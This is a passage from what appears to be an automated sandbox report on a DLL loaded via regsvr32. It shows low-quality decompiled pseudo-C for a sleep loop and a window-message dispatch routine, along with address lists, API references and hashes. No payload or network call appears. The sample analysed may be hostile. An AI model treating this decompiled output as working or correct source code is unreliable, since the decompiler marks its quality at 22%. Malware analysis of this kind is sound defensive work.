					if(_t25 != 0 || _t34 == 0) {
						break;
					}
					_t22 =  *0x10075348 - _t14; // 0x0
					if(_t22 > 0) {
						Sleep();
						_t7 = _t36 + 0x3e8; // 0x3e8
						r11d = _t7;
						_t17 =  >  ? r13d : r11d;
						if(( >  ? r13d : r11d) != r13d) {
							continue;
						} else {
						}
					}
					break;
				}
				return _t14;
			}












                                                                              0x1003d560
                                                                              0x1003d560
                                                                              0x1003d560
                                                                              0x1003d560
                                                                              0x1003d564
                                                                              0x1003d569
                                                                              0x1003d56e
                                                                              0x1003d573
                                                                              0x1003d578
                                                                              0x1003d57d
                                                                              0x1003d580
                                                                              0x1003d586
                                                                              0x1003d58b
                                                                              0x1003d58e
                                                                              0x1003d5a0
                                                                              0x1003d5a9
                                                                              0x1003d5b1
                                                                              0x1003d5b4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003d5bb
                                                                              0x1003d5c1
                                                                              0x1003d5c5
                                                                              0x1003d5cb
                                                                              0x1003d5cb
                                                                              0x1003d5dc
                                                                              0x1003d5e3
                                                                              0x00000000
                                                                              0x1003d5e5
                                                                              0x1003d5e5
                                                                              0x1003d5e3
                                                                              0x00000000
                                                                              0x1003d5c1
                                                                              0x1003d60a

                                                                              APIs
                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,10052558), ref: 1003D5C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 31afe58e18f8ba5a66f44c6f6636e380310392f0a4e7f52f0c4034e09b79d1e5
                                                                              • Instruction ID: 5685cde98d72933dc10dfe159fc1c9c8e726b01859fdf43c9d1aa76cc3ddef82
                                                                              • Opcode Fuzzy Hash: 31afe58e18f8ba5a66f44c6f6636e380310392f0a4e7f52f0c4034e09b79d1e5
                                                                              • Instruction Fuzzy Hash: 57014036614FD186C611AF01B84028AF7A4F789FE9F990215EFC917B68CB79D990CB44
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100143A4 Relevance: .8, Instructions: 803COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 22%
                                                                              			E100143A4(void* __ebx, signed int __edx, signed short __esi, intOrPtr* __rcx, unsigned long long __r8, unsigned long long __r9, unsigned long long __r11) {
				signed short _t131;
				signed int _t132;
				signed short _t134;
				unsigned long long _t147;
				unsigned long long _t237;
				unsigned long long _t238;
				unsigned long long _t241;
				signed int _t247;
				intOrPtr _t250;
				signed int _t287;
				signed short _t289;
				unsigned long long _t297;
				unsigned long long _t298;
				unsigned long long _t299;
				void* _t306;
				unsigned long long _t319;
				unsigned long long _t326;
				signed long long _t334;
				signed long long _t335;
				long long* _t336;
				long long* _t339;
				intOrPtr _t342;
				unsigned long long _t343;
				unsigned long long _t345;
				unsigned long long _t347;
				unsigned long long _t349;
				unsigned long long _t351;
				unsigned long long _t355;
				unsigned long long _t357;
				unsigned long long _t359;
				unsigned long long _t362;
				unsigned long long _t364;
				unsigned long long _t382;
				unsigned long long _t384;
				unsigned long long _t388;
				unsigned long long _t391;
				unsigned long long _t394;
				unsigned long long _t401;
				unsigned long long _t403;
				unsigned long long _t405;
				unsigned long long _t407;
				unsigned long long _t410;
				unsigned long long _t415;
				unsigned long long _t417;
				unsigned long long _t419;
				unsigned long long _t421;
				unsigned long long _t423;
				unsigned long long _t428;
				unsigned long long _t432;
				unsigned long long _t436;
				unsigned long long _t439;
				unsigned long long _t443;
				unsigned long long _t453;
				unsigned long long _t457;
				unsigned long long _t461;
				unsigned long long _t464;
				unsigned long long _t467;
				unsigned long long _t470;
				unsigned long long _t474;
				unsigned long long _t485;
				long long* _t486;
				unsigned long long _t517;
				unsigned long long _t518;
				unsigned long long _t519;
				intOrPtr* _t527;
				void* _t528;
				unsigned long long _t561;
				void* _t564;
				unsigned long long _t565;

				_t561 = __r11;
				_t553 = __r9;
				_t529 = __r8;
				_t289 = __esi;
				_t252 = __edx;
				_t244 = __ebx;
				 *((long long*)(_t528 + 0x68)) = 0xfffffffe;
				_t521 = __r9;
				_t562 = __r8;
				r13d = __edx;
				_t527 = __rcx;
				 *(_t528 + 0x30) = 0;
				 *((intOrPtr*)(_t528 + 0x40)) = 0x7fffffff;
				r15d = 1;
				if(__edx != 0x111) {
					__eflags = __edx - 0x4e;
					if(__edx != 0x4e) {
						__eflags = __edx - 6;
						if(__eflags == 0) {
							E10011808(__ebx, __edx, _t297, __r9, _t484, __r8, __r9, __r11);
							_t529 = _t297;
							_t484 = __r8;
							_t131 = E10013B14(__edx, __esi, __eflags, _t297, _t527, __r8, _t297, __r11);
						}
						__eflags = r13d - 0x20;
						if(r13d != 0x20) {
							L13:
							_t298 =  *((intOrPtr*)(_t527 + 0x98));
							__eflags = _t298;
							if(_t298 == 0) {
								L21:
								_t299 =  *_t527;
								_t132 =  *((intOrPtr*)(_t299 + 0x50))();
								_t517 = _t299;
								_t247 = (_t132 ^ r13d) & 0x000001ff;
								 *((intOrPtr*)(_t528 + 0x40)) = 7;
								E10029974();
								_t335 = _t334 + _t334 * 2;
								_t485 = 0x10071590;
								__eflags = r13d -  *((intOrPtr*)(0x10071590 + _t335 * 8));
								if(r13d !=  *((intOrPtr*)(0x10071590 + _t335 * 8))) {
									L27:
									 *(_t485 + _t335 * 8) = r13d;
									 *(_t485 + 0x10 + _t335 * 8) = _t517;
									_t339 =  *_t517;
									_t134 = 0;
									__eflags = _t339 - _t299;
									if(_t339 == _t299) {
										L183:
										 *(_t485 + 8 + _t335 * 8) = _t299;
										E10029A00();
										__eflags = 0;
										return 0;
									} else {
										goto L28;
									}
									do {
										L28:
										__eflags = r13d - 0xc000;
										if(r13d >= 0xc000) {
											_t518 =  *((intOrPtr*)(_t517 + 8));
											goto L38;
											do {
												__eflags =  *_t518 - 0xc000;
												if( *_t518 != 0xc000) {
													goto L42;
												}
												__eflags =  *((intOrPtr*)(_t518 + 4)) - _t134;
												if( *((intOrPtr*)(_t518 + 4)) != _t134) {
													goto L42;
												}
												__eflags =  *((intOrPtr*)(_t518 + 8)) - _t134;
												if( *((intOrPtr*)(_t518 + 8)) <= _t134) {
													L44:
													__eflags = _t518 - _t299;
													if(_t518 == _t299) {
														goto L47;
													}
													_t299 =  *((intOrPtr*)(_t518 + 0x10));
													__eflags =  *_t299 - r13d;
													if( *_t299 == r13d) {
														_t299 = 0x10071590;
														 *(0x10071590 + 8 + _t335 * 8) = _t518;
														E10029A00();
														 *((intOrPtr*)(_t528 + 0x40)) = 0x7fffffff;
														L178:
														 *((long long*)( *((intOrPtr*)(_t518 + 0x18))))();
														 *(_t528 + 0x30) = _t299;
														L179:
														_t486 =  *((intOrPtr*)(_t528 + 0x180));
														if(_t486 != 0) {
															 *_t486 =  *(_t528 + 0x30);
														}
														return r15d;
													} else {
														_t518 = _t518 + 0x20;
														_t134 = 0;
														L38:
														__eflags =  *((intOrPtr*)(_t518 + 0x10)) - _t299;
														if( *((intOrPtr*)(_t518 + 0x10)) == _t299) {
															goto L43;
														}
														continue;
													}
												}
												L42:
												_t518 = _t518 + 0x20;
												__eflags =  *((intOrPtr*)(_t518 + 0x10)) - _t299;
											} while ( *((intOrPtr*)(_t518 + 0x10)) != _t299);
											L43:
											_t518 = _t299;
											goto L44;
										}
										_t519 =  *((intOrPtr*)(_t517 + 8));
										__eflags =  *((intOrPtr*)(_t519 + 0x10)) - _t299;
										if( *((intOrPtr*)(_t519 + 0x10)) == _t299) {
											L34:
											_t519 = _t299;
											L35:
											__eflags = _t519 - _t299;
											if(_t519 != _t299) {
												_t299 = 0x10071590;
												 *(0x10071590 + 8 + _t335 * 8) = _t519;
												_t250 = 7;
												E10029A00();
												 *((intOrPtr*)(_t528 + 0x40)) = 0x7fffffff;
												L50:
												_t336 =  *((intOrPtr*)(_t519 + 0x18));
												_t342 =  *((intOrPtr*)(_t519 + 0x10));
												__eflags = _t342 - 0x1d;
												if(_t342 > 0x1d) {
													__eflags = _t342 - 0x2c;
													if(_t342 > 0x2c) {
														__eflags = _t342 - 0x33;
														if(_t342 > 0x33) {
															_t343 = _t342 - 0x34;
															__eflags = _t343;
															if(_t343 == 0) {
																r8d = _t134 & 0x0000ffff;
																 *_t336();
																goto L179;
															}
															_t345 = _t343 - _t565;
															__eflags = _t345;
															if(_t345 == 0) {
																 *((intOrPtr*)(_t528 + 0x38)) = _t289;
																 *((intOrPtr*)(_t528 + 0x3c)) = _t289;
																 *_t336();
																goto L179;
															}
															_t347 = _t345 - _t565;
															__eflags = _t347;
															if(_t347 == 0) {
																 *_t336();
																 *(_t528 + 0x30) = _t565;
																goto L179;
															}
															_t349 = _t347 - _t565;
															__eflags = _t349;
															if(_t349 == 0) {
																 *((intOrPtr*)(_t528 + 0x38)) = _t289;
																 *((intOrPtr*)(_t528 + 0x3c)) = _t289;
																 *_t336();
																_t147 = _t299;
																 *(_t528 + 0x30) = _t299;
																__eflags = _t299;
																if(_t299 != 0) {
																	goto L179;
																}
																return _t147;
															}
															_t351 = _t349 - 0xd;
															__eflags = _t351;
															if(_t351 == 0) {
																 *_t336();
																 *(_t528 + 0x30) = _t299;
																__eflags = _t299;
																if(_t299 == 0) {
																	goto L179;
																}
																return 0;
															}
															__eflags = _t351 - _t565;
															if(_t351 == _t565) {
																 *((intOrPtr*)(_t528 + 0x38)) = _t289;
																 *((intOrPtr*)(_t528 + 0x3c)) = _t289;
																 *_t336();
																 *(_t528 + 0x30) = _t299;
															}
															goto L179;
														}
														__eflags = _t342 - 0x33;
														if(_t342 == 0x33) {
															 *_t336();
														} else {
															_t355 = _t342 - 0x2d;
															__eflags = _t355;
															if(_t355 == 0) {
																 *_t336();
															} else {
																_t357 = _t355 - _t565;
																__eflags = _t357;
																if(_t357 == 0) {
																	 *_t336();
																	 *(_t528 + 0x30) = _t565;
																} else {
																	_t359 = _t357 - _t565;
																	__eflags = _t359;
																	if(_t359 == 0) {
																		 *(_t528 + 0x30) =  *_t336();
																	} else {
																		_t362 = _t359 - _t565;
																		__eflags = _t362;
																		if(_t362 == 0) {
																			 *((intOrPtr*)(_t528 + 0x38)) = _t289;
																			 *((intOrPtr*)(_t528 + 0x3c)) = _t289;
																			r11d =  *_t336();
																			 *(_t528 + 0x30) = _t561;
																		} else {
																			_t364 = _t362 - _t565;
																			__eflags = _t364;
																			if(_t364 == 0) {
																				r11d =  *_t336();
																				 *(_t528 + 0x30) = _t561;
																			} else {
																				__eflags = _t364 - _t565;
																				if(_t364 == _t565) {
																					 *_t336();
																				}
																			}
																		}
																	}
																}
															}
														}
														goto L179;
													}
													__eflags = _t342 - 0x2c;
													if(_t342 == 0x2c) {
														 *_t336();
													} else {
														__eflags = _t342 - 0x24;
														if(_t342 > 0x24) {
															__eflags = _t342 - 0x25;
															if(_t342 == 0x25) {
																E10011808(_t247, _t252, _t521 >> 0x10, _t562, _t485, _t529, _t553, _t561);
																r9d = _t134 & 0x0000ffff;
																r8d = _t289 & 0x0000ffff;
																 *_t336();
															} else {
																__eflags = _t342 - 0x26;
																if(_t342 == 0x26) {
																	 *((intOrPtr*)(_t528 + 0x38)) = _t289;
																	 *((intOrPtr*)(_t528 + 0x3c)) = _t289;
																	E10011808(_t247, _t252, _t299, _t562, _t485, _t529, _t553, _t561);
																	 *_t336();
																} else {
																	__eflags = _t342 - 0x27;
																	if(_t342 == 0x27) {
																		E10011808(_t247, _t252, _t299, _t562, _t485, _t529, _t553, _t561);
																		 *_t336();
																	} else {
																		__eflags = _t342 - 0x28;
																		if(_t342 == 0x28) {
																			 *_t336();
																			 *(_t528 + 0x30) = _t299;
																		} else {
																			__eflags = _t342 - 0x29;
																			if(_t342 == 0x29) {
																				E10011808(_t247, _t252, _t562 >> 0x10, _t521, _t485, _t529, _t553, _t561);
																				r9d = _t134 & 0x0000ffff;
																				 *_t336();
																			} else {
																				_t306 = _t342 - 0x2a;
																				__eflags = _t306 - _t565;
																				if(_t306 <= _t565) {
																					r12d = r12w;
																					__eflags = _t342 - 0x2a;
																					if(_t342 != 0x2a) {
																						r8d = r12d;
																						 *_t336();
																					} else {
																						E10011808(_t247, _t252, _t306, _t521, _t485, _t529, _t553, _t561);
																						r8d = r12d;
																						 *_t336();
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															__eflags = _t342 - 0x24;
															if(_t342 == 0x24) {
																E10011808(_t247, _t252, _t299, _t521, _t485, _t529, _t553, _t561);
																 *_t336();
															} else {
																_t382 = _t342 - 0x1e;
																__eflags = _t382;
																if(_t382 == 0) {
																	 *_t336();
																} else {
																	_t384 = _t382 - _t565;
																	__eflags = _t384;
																	if(_t384 == 0) {
																		E10011808(_t247, _t252, _t299, _t562, _t485, _t529, _t553, _t561);
																		E10011808(_t247, _t252, _t299, _t521, _t485, _t529, _t553, _t561);
																		__eflags =  *((intOrPtr*)(_t527 + 0x40)) - _t521;
																		 *_t336();
																	} else {
																		_t388 = _t384 - _t565;
																		__eflags = _t388;
																		if(_t388 == 0) {
																			E1000C9E0(_t247, _t252, _t299, _t562, _t485, _t529, _t553, _t561);
																			 *_t336();
																		} else {
																			_t391 = _t388 - _t565;
																			__eflags = _t391;
																			if(_t391 == 0) {
																				E1002AC28(_t247, _t252, _t299, _t562, _t485, _t529, _t553, _t561);
																				 *_t336();
																			} else {
																				_t394 = _t391 - _t565;
																				__eflags = _t394;
																				if(_t394 == 0) {
																					E1002AC28(_t247, _t252, _t521 >> 0x10, _t562, _t485, _t529, _t553, _t561);
																					r9d = _t134;
																					r8d = _t289;
																					 *_t336();
																				} else {
																					__eflags = _t394 - _t565;
																					if(_t394 == _t565) {
																						E10011808(_t247, _t252, _t299, _t562, _t485, _t529, _t553, _t561);
																						 *_t336();
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t342 - 0x1d;
													if(_t342 == 0x1d) {
														 *(_t528 + 0x30) =  *_t336();
													} else {
														__eflags = _t342 - 0xf;
														if(_t342 > 0xf) {
															__eflags = _t342 - 0x16;
															if(_t342 > 0x16) {
																_t401 = _t342 - 0x17;
																__eflags = _t401;
																if(_t401 == 0) {
																	r8d = _t134;
																	 *_t336();
																} else {
																	_t403 = _t401 - _t565;
																	__eflags = _t403;
																	if(_t403 == 0) {
																		r9d = _t134 & 0x0000ffff;
																		r8d = _t289 & 0x0000ffff;
																		 *_t336();
																	} else {
																		_t405 = _t403 - _t565;
																		__eflags = _t405;
																		if(_t405 == 0) {
																			r9d = _t134 & 0x0000ffff;
																			r8d = _t289 & 0x0000ffff;
																			 *_t336();
																		} else {
																			_t407 = _t405 - _t565;
																			__eflags = _t407;
																			if(_t407 == 0) {
																				E10011808(_t247, _t252, _t299, _t521, _t485, _t529, _t553, _t561);
																				 *_t336();
																			} else {
																				_t410 = _t407 - _t565;
																				__eflags = _t410;
																				if(_t410 == 0) {
																					 *(_t528 + 0x30) =  *_t336();
																				} else {
																					__eflags = _t410 - _t565;
																					if(_t410 == _t565) {
																						r11d =  *_t336();
																						 *(_t528 + 0x30) = _t561;
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																__eflags = _t342 - 0x16;
																if(_t342 == 0x16) {
																	r8d = _t134 & 0x0000ffff;
																	 *_t336();
																} else {
																	_t415 = _t342 - 0x10;
																	__eflags = _t415;
																	if(_t415 == 0) {
																		 *_t336();
																	} else {
																		_t417 = _t415 - _t565;
																		__eflags = _t417;
																		if(_t417 == 0) {
																			 *_t336();
																		} else {
																			_t419 = _t417 - _t565;
																			__eflags = _t419;
																			if(_t419 == 0) {
																				 *_t336();
																			} else {
																				_t421 = _t419 - _t565;
																				__eflags = _t421;
																				if(_t421 == 0) {
																					 *_t336();
																				} else {
																					_t423 = _t421 - _t565;
																					__eflags = _t423;
																					if(_t423 == 0) {
																						 *_t336();
																					} else {
																						__eflags = _t423 - _t565;
																						if(_t423 == _t565) {
																							r8d = _t289;
																							 *_t336();
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															__eflags = _t342 - 0xf;
															if(_t342 == 0xf) {
																r8d = E1002AC28(_t247, _t252, _t299, _t521, _t485, _t529, _t553, _t561) & 0x0000ffff;
																 *_t336();
																 *(_t528 + 0x30) = _t562 >> 0x10;
															} else {
																__eflags = _t342 - 8;
																if(_t342 > 8) {
																	_t428 = _t342 - 9;
																	__eflags = _t428;
																	if(_t428 == 0) {
																		E1000C370(_t528 + 0x48);
																		_t319 =  *((intOrPtr*)(_t521 + 8));
																		 *(_t528 + 0x50) = _t319;
																		r8d =  *(_t521 + 0x10);
																		 *_t336();
																		 *(_t528 + 0x50) = 0;
																		 *(_t528 + 0x30) = _t319;
																		E1000CA9C(_t528 + 0x48);
																	} else {
																		_t432 = _t428 - _t565;
																		__eflags = _t432;
																		if(_t432 == 0) {
																			E10011808(_t247, _t252, _t562 >> 0x10, _t521, _t485, _t529, _t553, _t561);
																			r9d = _t134 & 0x0000ffff;
																			 *(_t528 + 0x30) =  *_t336();
																		} else {
																			_t436 = _t432 - _t565;
																			__eflags = _t436;
																			if(_t436 == 0) {
																				r8d = _t134 & 0x0000ffff;
																				 *(_t528 + 0x30) =  *_t336();
																			} else {
																				_t439 = _t436 - _t565;
																				__eflags = _t439;
																				if(_t439 == 0) {
																					E10011808(_t247, _t252, _t521 >> 0x10, _t562, _t485, _t529, _t553, _t561);
																					r9d = _t134 & 0x0000ffff;
																					r8d = _t289 & 0x0000ffff;
																					 *(_t528 + 0x30) =  *_t336();
																				} else {
																					_t443 = _t439 - _t565;
																					__eflags = _t443;
																					if(_t443 == 0) {
																						 *(_t528 + 0x30) =  *_t336();
																					} else {
																						__eflags = _t443 - _t565;
																						if(_t443 == _t565) {
																							 *_t336();
																							 *(_t528 + 0x30) = _t299;
																						}
																					}
																				}
																			}
																		}
																	}
																} else {
																	__eflags = _t342 - 8;
																	if(_t342 == 8) {
																		E1000C370(_t528 + 0x48);
																		_t326 =  *((intOrPtr*)(_t521 + 8));
																		 *(_t528 + 0x50) = _t326;
																		E1000F9FC(__eflags, _t326, _t528 + 0x70);
																		 *((long long*)(_t528 + 0xb0)) =  *_t521;
																		_t287 =  *(_t521 + 0x10);
																		E10011844(_t247, _t250, _t289, _t326,  *_t521, _t485, _t561);
																		__eflags = _t326;
																		if(_t326 == 0) {
																			_t453 =  *((intOrPtr*)(_t527 + 0x98));
																			__eflags = _t453;
																			if(_t453 != 0) {
																				E100292C0(_t326, _t453 + 0x48,  *((intOrPtr*)(_t528 + 0xb0)));
																				__eflags = _t326;
																				_t456 =  !=  ? _t326 :  *((intOrPtr*)(_t528 + 0x110));
																				 *((long long*)(_t528 + 0x110)) =  !=  ? _t326 :  *((intOrPtr*)(_t528 + 0x110));
																			}
																			_t326 = _t528 + 0x70;
																		}
																		r9d = _t287;
																		 *_t336();
																		 *(_t528 + 0x50) = 0;
																		 *((long long*)(_t528 + 0xb0)) = 0;
																		 *(_t528 + 0x30) = _t326;
																		E10012484(_t528 + 0x70);
																		E1000CA9C(_t528 + 0x48);
																	} else {
																		_t457 = _t342 - _t565;
																		__eflags = _t457;
																		if(_t457 == 0) {
																			E1000C9E0(_t247, _t252, _t299, _t562, _t485, _t529, _t553, _t561);
																			 *(_t528 + 0x30) =  *_t336();
																		} else {
																			_t461 = _t457 - _t565;
																			__eflags = _t461;
																			if(_t461 == 0) {
																				 *(_t528 + 0x30) =  *_t336();
																			} else {
																				_t464 = _t461 - _t565;
																				__eflags = _t464;
																				if(_t464 == 0) {
																					 *(_t528 + 0x30) =  *_t336();
																				} else {
																					_t467 = _t464 - _t565;
																					__eflags = _t467;
																					if(_t467 == 0) {
																						 *(_t528 + 0x30) =  *_t336();
																					} else {
																						_t470 = _t467 - _t565;
																						__eflags = _t470;
																						if(_t470 == 0) {
																							E10011808(_t247, _t252, _t521 >> 0x10, _t562, _t485, _t529, _t553, _t561);
																							r9d = _t134 & 0x0000ffff;
																							r8d = _t289 & 0x0000ffff;
																							 *(_t528 + 0x30) =  *_t336();
																						} else {
																							_t474 = _t470 - _t565;
																							__eflags = _t474;
																							if(_t474 == 0) {
																								E10011808(_t247, _t252, _t299, _t562, _t485, _t529, _t553, _t561);
																								 *(_t528 + 0x30) =  *_t336();
																							} else {
																								__eflags = _t474 - _t565;
																								if(_t474 == _t565) {
																									 *(_t528 + 0x30) =  *_t336();
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
												goto L179;
											} else {
												goto L47;
											}
										} else {
											goto L30;
										}
										do {
											L30:
											__eflags =  *_t519 - r13d;
											if( *_t519 != r13d) {
												goto L33;
											}
											__eflags =  *((intOrPtr*)(_t519 + 4)) - _t134;
											if( *((intOrPtr*)(_t519 + 4)) != _t134) {
												goto L33;
											}
											__eflags =  *((intOrPtr*)(_t519 + 8)) - _t134;
											if( *((intOrPtr*)(_t519 + 8)) <= _t134) {
												goto L35;
											}
											L33:
											_t519 = _t519 + 0x20;
											__eflags =  *((intOrPtr*)(_t519 + 0x10)) - _t299;
										} while ( *((intOrPtr*)(_t519 + 0x10)) != _t299);
										goto L34;
										L47:
										 *_t339();
										_t517 = _t299;
										_t339 =  *_t299;
										_t134 = 0;
										__eflags = _t339 - _t299;
									} while (_t339 != _t299);
									_t485 = 0x10071590;
									goto L183;
								}
								__eflags = _t517 -  *((intOrPtr*)(0x10071590 + 0x10 + _t335 * 8));
								if(_t517 !=  *((intOrPtr*)(0x10071590 + 0x10 + _t335 * 8))) {
									goto L27;
								}
								_t519 =  *(0x10071590 + 8 + _t335 * 8);
								_t250 = 7;
								E10029A00();
								 *((intOrPtr*)(_t528 + 0x40)) = 0x7fffffff;
								__eflags = _t519;
								if(_t519 == 0) {
									return 0;
								}
								__eflags = r13d - 0xc000;
								if(r13d < 0xc000) {
									goto L50;
								} else {
									goto L178;
								}
							}
							__eflags =  *((intOrPtr*)(_t298 + 0xe0));
							if( *((intOrPtr*)(_t298 + 0xe0)) <= 0) {
								goto L21;
							}
							__eflags = r13d - 0x200;
							if(r13d < 0x200) {
								L17:
								__eflags = r13d - 0x100;
								if(r13d < 0x100) {
									L19:
									_t11 = _t564 - 0x281; // 0xb998
									__eflags = _t11 - 0x10;
									if(_t11 > 0x10) {
										goto L21;
									}
									L20:
									 *((long long*)(_t528 + 0x20)) = _t528 + 0x30;
									_t553 = _t521;
									_t529 = _t562;
									_t252 = r13d;
									_t237 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x98)))) + 0x128))();
									__eflags = _t237;
									if(_t237 != 0) {
										goto L179;
									}
									goto L21;
								}
								__eflags = r13d - 0x10f;
								if(r13d <= 0x10f) {
									goto L20;
								}
								goto L19;
							}
							__eflags = r13d - 0x209;
							if(r13d <= 0x209) {
								goto L20;
							}
							goto L17;
						}
						r8d = _t131 & 0x0000ffff;
						_t252 = _t289;
						_t238 = E10013BA0(_t244, _t289, _t289, _t521 >> 0x10, _t527, _t484, _t529, _t553, _t561);
						__eflags = _t238;
						if(_t238 == 0) {
							goto L13;
						} else {
							 *(_t528 + 0x30) = _t565;
							goto L179;
						}
					}
					__eflags =  *__r9;
					if( *__r9 == 0) {
						L7:
						return 0;
					}
					_t241 =  *((intOrPtr*)( *__rcx + 0x1d8))();
					__eflags = _t241;
					if(_t241 != 0) {
						goto L179;
					}
					goto L7;
				} else {
					if( *((intOrPtr*)( *__rcx + 0x1d0))() == 0) {
						return 0;
					} else {
						 *(_t528 + 0x30) = _t565;
						goto L179;
					}
				}
			}








































































                                                                              0x100143a4
                                                                              0x100143a4
                                                                              0x100143a4
                                                                              0x100143a4
                                                                              0x100143a4
                                                                              0x100143a4
                                                                              0x100143b6
                                                                              0x100143bf
                                                                              0x100143c2
                                                                              0x100143c5
                                                                              0x100143c8
                                                                              0x100143cb
                                                                              0x100143d4
                                                                              0x100143dc
                                                                              0x100143e8
                                                                              0x1001440e
                                                                              0x10014411
                                                                              0x1001443c
                                                                              0x1001443f
                                                                              0x10014444
                                                                              0x10014449
                                                                              0x1001444c
                                                                              0x10014452
                                                                              0x10014452
                                                                              0x10014457
                                                                              0x1001445b
                                                                              0x10014481
                                                                              0x10014481
                                                                              0x10014488
                                                                              0x1001448b
                                                                              0x100144f1
                                                                              0x100144f1
                                                                              0x100144f8
                                                                              0x100144fb
                                                                              0x10014503
                                                                              0x1001450e
                                                                              0x10014514
                                                                              0x10014519
                                                                              0x1001451d
                                                                              0x10014524
                                                                              0x10014528
                                                                              0x10014566
                                                                              0x10014566
                                                                              0x1001456a
                                                                              0x1001456f
                                                                              0x10014572
                                                                              0x10014574
                                                                              0x10014577
                                                                              0x10014f02
                                                                              0x10014f02
                                                                              0x10014f0c
                                                                              0x10014f12
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001457d
                                                                              0x1001457d
                                                                              0x1001457d
                                                                              0x10014584
                                                                              0x100145b3
                                                                              0x100145b3
                                                                              0x100145bd
                                                                              0x100145bd
                                                                              0x100145c3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100145c5
                                                                              0x100145c8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100145ca
                                                                              0x100145cd
                                                                              0x100145dc
                                                                              0x100145dc
                                                                              0x100145df
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100145e1
                                                                              0x100145e5
                                                                              0x100145e8
                                                                              0x10014eae
                                                                              0x10014eb5
                                                                              0x10014ebf
                                                                              0x10014ec4
                                                                              0x10014ecc
                                                                              0x10014ed9
                                                                              0x10014edc
                                                                              0x10014ee1
                                                                              0x10014ee1
                                                                              0x10014eec
                                                                              0x10014ef3
                                                                              0x10014ef3
                                                                              0x00000000
                                                                              0x100145ee
                                                                              0x100145ee
                                                                              0x100145f2
                                                                              0x100145b7
                                                                              0x100145b7
                                                                              0x100145bb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100145bb
                                                                              0x100145e8
                                                                              0x100145cf
                                                                              0x100145cf
                                                                              0x100145d3
                                                                              0x100145d3
                                                                              0x100145d9
                                                                              0x100145d9
                                                                              0x00000000
                                                                              0x100145d9
                                                                              0x10014586
                                                                              0x1001458a
                                                                              0x1001458e
                                                                              0x100145a9
                                                                              0x100145a9
                                                                              0x100145ac
                                                                              0x100145ac
                                                                              0x100145af
                                                                              0x1001460e
                                                                              0x10014615
                                                                              0x1001461a
                                                                              0x1001461f
                                                                              0x10014624
                                                                              0x1001462c
                                                                              0x1001462c
                                                                              0x10014630
                                                                              0x10014634
                                                                              0x10014638
                                                                              0x10014abf
                                                                              0x10014ac3
                                                                              0x10014ce6
                                                                              0x10014cea
                                                                              0x10014db6
                                                                              0x10014db6
                                                                              0x10014dba
                                                                              0x10014e9c
                                                                              0x10014eaa
                                                                              0x00000000
                                                                              0x10014eaa
                                                                              0x10014dc0
                                                                              0x10014dc0
                                                                              0x10014dc3
                                                                              0x10014e77
                                                                              0x10014e82
                                                                              0x10014e91
                                                                              0x00000000
                                                                              0x10014e91
                                                                              0x10014dc9
                                                                              0x10014dc9
                                                                              0x10014dcc
                                                                              0x10014e6b
                                                                              0x10014e6d
                                                                              0x00000000
                                                                              0x10014e6d
                                                                              0x10014dd2
                                                                              0x10014dd2
                                                                              0x10014dd5
                                                                              0x10014e29
                                                                              0x10014e34
                                                                              0x10014e4b
                                                                              0x10014e4d
                                                                              0x10014e4f
                                                                              0x10014e54
                                                                              0x10014e57
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10014e57
                                                                              0x10014dd7
                                                                              0x10014dd7
                                                                              0x10014ddb
                                                                              0x10014e0f
                                                                              0x10014e11
                                                                              0x10014e16
                                                                              0x10014e19
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10014e1f
                                                                              0x10014ddd
                                                                              0x10014de0
                                                                              0x10014de9
                                                                              0x10014df4
                                                                              0x10014e00
                                                                              0x10014e02
                                                                              0x10014e02
                                                                              0x00000000
                                                                              0x10014de0
                                                                              0x10014cf0
                                                                              0x10014cf4
                                                                              0x10014daf
                                                                              0x10014cfa
                                                                              0x10014cfa
                                                                              0x10014cfa
                                                                              0x10014cfe
                                                                              0x10014da2
                                                                              0x10014d04
                                                                              0x10014d04
                                                                              0x10014d04
                                                                              0x10014d07
                                                                              0x10014d8d
                                                                              0x10014d8f
                                                                              0x10014d09
                                                                              0x10014d09
                                                                              0x10014d09
                                                                              0x10014d0c
                                                                              0x10014d7a
                                                                              0x10014d0e
                                                                              0x10014d0e
                                                                              0x10014d0e
                                                                              0x10014d11
                                                                              0x10014d46
                                                                              0x10014d51
                                                                              0x10014d5f
                                                                              0x10014d62
                                                                              0x10014d13
                                                                              0x10014d13
                                                                              0x10014d13
                                                                              0x10014d16
                                                                              0x10014d36
                                                                              0x10014d39
